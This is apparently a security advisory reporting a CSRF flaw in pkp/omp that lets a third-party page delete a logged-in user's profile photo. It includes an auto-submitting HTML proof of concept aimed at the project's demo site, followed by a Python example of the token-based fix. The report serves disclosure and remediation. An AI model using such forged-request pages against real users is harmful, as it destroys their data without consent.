Cross-Site Request Forgery (CSRF) in pkp/omp (Valid)
Oct 14th 2021
An attacker or malicious user is able to delete any user's profile photo if a logged-in user visits the attacker's website, because the delete request lacks a CSRF token.
🕵️♂️ Proof of Concept
1. While logged in, open POC.html in a browser.
2. Check your profile: the profile photo has been deleted without your intent.

```html
<!-- POC.html -->
<html>
  <body>
    <!-- replace the visible URL with "/" so the address bar does not show the PoC file name -->
    <script>history.pushState('', '', '/')</script>
    <!-- no method attribute, so the form issues a GET; the browser attaches the victim's session cookies -->
    <form action="https://demo.publicknowledgeproject.org/omp3/demo/index.php/aup-demo/$$$call$$$/tab/user/profile-tab/delete-profile-image">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // document.forms is a collection, so submit its first (and only) form
      document.forms[0].submit();
    </script>
  </body>
</html>
```
This vulnerability can force a user to unintentionally delete their profile photo.
Tested on Firefox and Safari.
You should require a CSRF token on this request.
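One way to implement the recommended fix, shown here as an added example that is not OMP's own code and does not use PKP's framework API: the server mints a random token per session, embeds it in its own delete form, and honours the delete only when a POST arrives carrying a token that matches the session's. The in-memory session store, the handler name and the form field name `csrf_token` are assumptions for the example. A forged request such as the PoC above (a cross-site GET with no token) is rejected before any state changes.

```python
"""Per-session CSRF token check for a state-changing handler.

Added example; not code from pkp/omp. Session store and names are assumed.
"""
import hmac
import secrets
from html import escape

# Constructed in-memory session store: session id -> session data.
SESSIONS = {}


def new_session():
    """Create a logged-in session with a fresh random CSRF token and a profile image."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {
        "csrf_token": secrets.token_urlsafe(32),
        "profile_image": "avatar.png",
    }
    return sid


def csrf_token_for(sid):
    """Token the server embeds in its own forms for this session."""
    return SESSIONS[sid]["csrf_token"]


def render_delete_form(sid):
    """Server-rendered delete form: the token travels as a hidden field.

    A third-party page cannot read this value, so it cannot forge a
    matching request even though the browser will send the session cookie.
    """
    token = escape(csrf_token_for(sid))
    return (
        '<form method="POST" action="/profile/delete-image">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        '<input type="submit" value="Delete profile image">'
        "</form>"
    )


def delete_profile_image(sid, method, form):
    """Handle the delete-profile-image action.

    Returns (http_status, message). The delete happens only for a POST
    whose csrf_token field equals the token bound to the caller's session.
    """
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "not logged in"
    # State changes must not ride on GET: a plain <form> or <img> on any
    # origin can issue one with the victim's cookies attached.
    if method != "POST":
        return 405, "method not allowed"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the check does not leak the token via timing.
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "invalid CSRF token"
    session["profile_image"] = None
    return 200, "profile image deleted"


if __name__ == "__main__":
    sid = new_session()
    # Forged cross-site GET, as in the PoC: rejected, image untouched.
    print(delete_profile_image(sid, "GET", {}))
    # Forged cross-site POST without the token: still rejected.
    print(delete_profile_image(sid, "POST", {}))
    print("image after forgeries:", SESSIONS[sid]["profile_image"])
    # Legitimate submission of the server-rendered form.
    print(render_delete_form(sid))
    print(delete_profile_image(sid, "POST", {"csrf_token": csrf_token_for(sid)}))
    print("image after real delete:", SESSIONS[sid]["profile_image"])
```

The token must be unpredictable and bound to the session (regenerated on login), and the comparison must be constant-time. Refusing GET for the delete is a separate, complementary control: even with a token check, a state-changing GET is easy to trigger from an image tag or link, so the handler above rejects it outright.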